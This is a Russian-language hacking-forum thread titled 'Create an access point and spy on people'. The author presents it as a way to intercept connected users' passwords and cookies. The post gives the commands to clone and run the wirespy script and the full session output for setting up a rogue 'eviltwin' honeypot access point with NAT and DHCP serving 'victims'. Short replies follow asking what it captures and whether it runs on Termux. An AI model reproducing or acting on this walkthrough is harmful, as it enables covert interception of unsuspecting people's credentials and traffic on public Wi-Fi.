Загрузка...

Создаем точку доступа и следим за людьми

Тема в разделе Wi-Fi создана пользователем opostal 9 июн 2021. 891 просмотр

Загрузка...
  1. opostal
    opostal Автор темы 9 июн 2021 Заблокирован(а) 40 27 янв 2021
    Сегодня мы создадим точку доступа и будем следить за клиентами (перехват паролей, куки и т.д)
    В этом поможет простой bash-cкрипт wirespy. Давайте установим его:
    Код
    git clone https://github.com/aress31/wirespy
    cd wirespy
    Код
    sudo bash wirespy.sh
    Если вы что-то не установили скрипт вам сообщит об этом.
    Что же умеет этот инструмент?
    [IMG]

    Конкретно нас интересует honeypot. Выбираем и указываем все что нужно
    Код
    wirespy » Select the Internet-facing interface:
    1) eth0: 192.168.59.133/24 00:0c:29:73:55:b6
    2) wlan0: 74:f0:6d:4e:97:d6
    3) wlan1: 2a:38:91:cf:5a:32
    4) quit
    wirespy > honeypot » 1
    wirespy » Do you wish to randomise eth0 MAC address (this option can cause problems)?
    1) yes
    2) no
    3) quit
    wirespy > honeypot » n
    wirespy > honeypot » 2
    wirespy » Select the wireless interface to use:
    1) wlan0: 74:f0:6d:4e:97:d6
    2) wlan1: 2a:38:91:cf:5a:32
    3) quit
    wirespy > honeypot » 2
    wirespy > informat » Starting monitor mode on wlan1...
    wirespy » Do you wish to randomise wlan1 MAC address (this option is recommended)?
    1) yes
    2) no
    3) quit
    wirespy > honeypot » 2
    wirespy > informat » Killing processes that may interfere with the honeypot|eviltwin...
    Killing these processes: PID Name 5128 wpa_supplicant

    wirespy > honeypot » Select the type of honeypot you want to set up:
    1) Blackhole: The access point type will respond to all probe requests (the access point may receive a lot of requests in areas with high levels of WiFi activity such as crowded public places).
    2) Bullzeye: The access point type will respond only to the probe requests specifying the access point ESSID.
    3) quit
    wirespy > honeypot » 2
    wirespy > honeypot » Enter the honeypot ESSID:
    wirespy » Test
    wirespy > honeypot » Enter the honeypot wireless channel (value must be between 1 and 12):
    wirespy » 4
    wirespy > honeypot » Do you want to enable WEP authentication?
    1) yes
    2) no
    3) quit
    wirespy > honeypot » 2
    wirespy > informat » Enabling IP forwarding...
    wirespy > informat » Configuring NAT iptables...
    wirespy > informat » Resetting pre-existing DHCP leases...
    wirespy > informat » Backing up /etc/dhcp/dhcpd.conf, /etc/default/isc-dhcp-server and importing the new configurations...
    wirespy > informat » Starting DHCP server to provide the victims with internet access...
    Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
    wirespy > informat » The honeypot Test is now running...
    wirespy »
    В дополнительном окошке xterm будут показываться все действия:
    [IMG]

    Мое мнение: этот скрипт переоценен, для теста сойдет
     
  2. unsurpassed_mark
    unsurpassed_mark 14 июн 2021 Заблокирован(а) 1 26 окт 2020
    что конкретно перехватывает?
     
    1. opostal Автор темы
  3. Skeef0_0
    Skeef0_0 19 июн 2021 18 30 янв 2021
    Это на термукс?
     
    1. Skeef0_0
      @grikosa,так термукс и есть прилога для андроида
Top